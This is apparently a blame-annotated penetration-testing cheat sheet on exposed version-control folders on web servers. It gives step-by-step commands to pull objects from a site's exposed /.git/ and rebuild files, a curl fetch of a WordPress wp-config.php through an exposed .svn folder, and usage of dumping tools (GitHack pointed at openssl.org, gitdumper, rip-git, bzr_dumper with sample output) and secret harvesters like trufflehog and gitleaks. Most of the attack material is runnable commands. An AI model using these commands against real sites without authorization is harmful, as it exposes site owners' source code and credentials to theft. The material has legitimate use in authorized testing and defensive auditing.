2018-11-18 13:12:05 +00:00
# Insecure source code management
2021-01-12 11:39:37 +00:00
* [Git ](#git )
+ [Example ](#example )
2021-01-12 11:45:12 +00:00
- [Recovering file contents from .git/logs/HEAD ](#recovering-file-contents-from-gitlogshead )
- [Recovering file contents from .git/index ](#recovering-file-contents-from-gitindex )
2021-01-12 11:39:37 +00:00
+ [Tools ](#tools )
- [Automatic recovery ](#automatic-recovery )
* [diggit.py ](#diggitpy )
* [GoGitDumper ](#gogitdumper )
* [rip-git ](#rip-git )
* [GitHack ](#githack )
* [GitTools ](#gittools )
- [Harvesting secrets ](#harvesting-secrets )
* [trufflehog ](#trufflehog )
* [Yar ](#yar )
* [Gitrob ](#gitrob )
* [Gitleaks ](#gitleaks )
2021-01-12 11:45:12 +00:00
* [Subversion ](#subversion )
+ [Example (Wordpress) ](#example-wordpress )
2021-01-12 11:39:37 +00:00
+ [Tools ](#tools-1 )
- [svn-extractor ](#svn-extractor )
* [Bazaar ](#bazaar )
+ [Tools ](#tools-2 )
- [rip-bzr.pl ](#rip-bzrpl )
2021-01-12 11:45:12 +00:00
- [bzr_dumper ](#bzr_dumper )
2021-01-12 11:39:37 +00:00
* [Mercurial ](#mercurial )
+ [Tools ](#tools-3 )
- [rip-hg.pl ](#rip-hgpl )
* [References ](#references )
## Git
2017-02-17 23:30:55 +00:00
2018-11-18 13:12:05 +00:00
The following examples will create either a copy of the .git or a copy of the current commit.
2018-11-25 23:25:06 +00:00
Check for the following files, if they exist you can extract the .git folder.
- .git/config
- .git/HEAD
- .git/logs/HEAD
2021-01-12 11:39:37 +00:00
### Example
2017-02-17 23:30:55 +00:00
2021-01-12 11:39:37 +00:00
#### Recovering file contents from .git/logs/HEAD
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
2018-08-12 21:30:22 +00:00
```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root < root @ dfc2eabdf236 . ( none ) > 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael < michael @ easyctf . com > 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael < michael @ easyctf . com > 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael < michael @ easyctf . com > 1489390332 +0000 commit: Prevent directory listing.
```
2021-01-12 11:39:37 +00:00
3. Access the commit using the hash
2018-08-12 21:30:22 +00:00
```powershell
2021-01-12 11:39:37 +00:00
# create an empty .git repository
2018-08-12 21:30:22 +00:00
git init test
cd test/.git
# download the file
2021-01-12 11:39:37 +00:00
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
# first byte for subdirectory, remaining bytes for filename
2018-08-12 21:30:22 +00:00
mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
2021-01-12 11:39:37 +00:00
# display the file
2018-08-12 21:30:22 +00:00
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael < michael @ easyctf . com > 1489390329 +0000
committer Michael < michael @ easyctf . com > 1489390329 +0000
Initial.
```
2017-03-19 22:51:56 +00:00
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
2018-08-12 21:30:22 +00:00
```powershell
2021-01-12 11:39:37 +00:00
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
2018-08-12 21:30:22 +00:00
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
2017-03-19 22:51:56 +00:00
5. Read the data (flag.txt)
2018-08-12 21:30:22 +00:00
```powershell
2021-01-12 11:39:37 +00:00
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
2018-08-12 21:30:22 +00:00
mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
2017-03-19 22:51:56 +00:00
2021-01-12 11:39:37 +00:00
#### Recovering file contents from .git/index
2019-02-07 22:33:47 +00:00
2021-01-12 11:39:37 +00:00
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
2019-02-07 22:33:47 +00:00
```powershell
pip3 install gin
gin ~/git-repo/.git/index
```
2021-01-12 11:39:37 +00:00
Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
2019-02-07 22:33:47 +00:00
```powershell
$ gin .git/index | egrep -e "name|sha1"
name = AWS Amazon Bucket S3/README.md
sha1 = 862a3e58d138d6809405aa062249487bee074b98
name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
```
2021-01-12 11:39:37 +00:00
### Tools
2019-02-07 22:33:47 +00:00
2021-01-12 11:39:37 +00:00
#### Automatic recovery
2019-02-07 22:33:47 +00:00
2021-01-12 11:39:37 +00:00
##### diggit.py
2017-02-17 23:30:55 +00:00
2018-08-12 21:30:22 +00:00
```powershell
2017-02-17 23:30:55 +00:00
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
-u is remote path, where .git folder exists
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder & & git init)
-o is a hash of particular Git object to download
```
2021-01-12 11:39:37 +00:00
##### GoGitDumper
2019-04-14 22:49:56 +00:00
```powershell
go get github.com/c-sto/gogitdumper
gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
git log
git checkout
```
2021-01-12 11:39:37 +00:00
##### rip-git
2018-08-12 21:30:22 +00:00
```powershell
2020-12-11 17:26:31 +00:00
git clone https://github.com/kost/dvcs-ripper
2021-01-12 11:39:37 +00:00
perl rip-git.pl -v -u "http://web.site/.git/"
2017-03-14 22:39:02 +00:00
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael < michael @ easyctf . com > 1489389105 +0000
committer Michael < michael @ easyctf . com > 1489389105 +0000
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
```
2021-01-12 11:39:37 +00:00
##### GitHack
2018-11-18 13:12:05 +00:00
```powershell
git clone https://github.com/lijiejie/GitHack
GitHack.py http://www.openssl.org/.git/
```
2021-01-12 11:39:37 +00:00
##### GitTools
2020-12-11 17:19:54 +00:00
```powershell
git clone https://github.com/internetwache/GitTools
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
git checkout -- .
```
2021-01-12 11:39:37 +00:00
#### Harvesting secrets
##### trufflehog
2018-11-18 13:12:05 +00:00
2021-01-12 11:39:37 +00:00
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
2018-11-18 13:12:05 +00:00
```powershell
pip install truffleHog # https://github.com/dxa4481/truffleHog
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
```
2021-01-12 11:39:37 +00:00
##### Yar
> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
```powershell
go get github.com/nielsing/yar # https://github.com/nielsing/yar
yar -o orgname --both
```
##### Gitrob
2018-11-18 13:12:05 +00:00
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
```powershell
go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
gitrob [options] target [target2] ... [targetN]
```
2021-01-12 11:39:37 +00:00
##### Gitleaks
2018-11-18 13:12:05 +00:00
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
```powershell
# Run gitleaks against a public repository
2021-01-12 11:39:37 +00:00
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
2018-11-18 13:12:05 +00:00
# Run gitleaks against a local repository already cloned into /tmp/
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
# Run gitleaks against a specific Github Pull request
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
or
go get -u github.com/zricethezav/gitleaks
```
2021-01-12 11:39:37 +00:00
## Subversion
2017-03-14 22:39:02 +00:00
2021-01-12 11:39:37 +00:00
### Example (Wordpress)
2017-03-14 22:39:02 +00:00
2018-08-12 21:30:22 +00:00
```powershell
2017-02-17 23:30:55 +00:00
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
```
2018-08-12 21:30:22 +00:00
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
```powershell
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
```
2017-02-17 23:30:55 +00:00
2. Download interesting files
2018-08-12 21:30:22 +00:00
* remove \$sha1\$ prefix
* add .svn-base postfix
2021-01-12 11:39:37 +00:00
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
2018-08-12 21:30:22 +00:00
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
2017-02-17 23:30:55 +00:00
2021-01-12 11:39:37 +00:00
### Tools
#### svn-extractor
2017-02-17 23:30:55 +00:00
2018-08-12 21:30:22 +00:00
```powershell
2017-06-04 15:58:09 +00:00
git clone https://github.com/anantshri/svn-extractor.git
2018-08-12 21:30:22 +00:00
python svn-extractor.py – url "url with .svn available"
2017-06-04 15:58:09 +00:00
```
2021-01-12 11:39:37 +00:00
## Bazaar
2019-03-15 22:27:14 +00:00
2021-01-12 11:39:37 +00:00
### Tools
#### rip-bzr.pl
2019-03-15 22:27:14 +00:00
```powershell
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
2020-12-11 17:52:21 +00:00
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
2019-03-15 22:27:14 +00:00
```
2021-01-12 11:39:37 +00:00
#### bzr_dumper
2019-03-15 22:27:14 +00:00
```powershell
git clone https://github.com/SeahunOh/bzr_dumper
python3 dumper.py -u "http://127.0.0.1:5000/" -o source
Created a standalone tree (format: 2a)
[!] Target : http://127.0.0.1:5000/
[+] Start.
[+] GET repository/pack-names
[+] GET README
[+] GET checkout/dirstate
[+] GET checkout/views
[+] GET branch/branch.conf
[+] GET branch/format
[+] GET branch/last-revision
[+] GET branch/tag
[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
[*] Finish
$ bzr revert
N application.py
N database.py
N static/
```
2021-01-12 11:39:37 +00:00
## Mercurial
### Tools
2020-12-11 17:52:21 +00:00
2021-01-12 11:39:37 +00:00
#### rip-hg.pl
2020-12-11 17:52:21 +00:00
```powershell
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2018-11-18 13:12:05 +00:00
- [bl4de, hidden_directories_leaks ](https://github.com/bl4de/research/tree/master/hidden_directories_leaks )
- [bl4de, diggit ](https://github.com/bl4de/security-tools/tree/master/diggit )
2020-08-31 21:54:48 +00:00
- [Gitrob: Now in Go - Michael Henriksen ](https://michenriksen.com/blog/gitrob-now-in-go/ )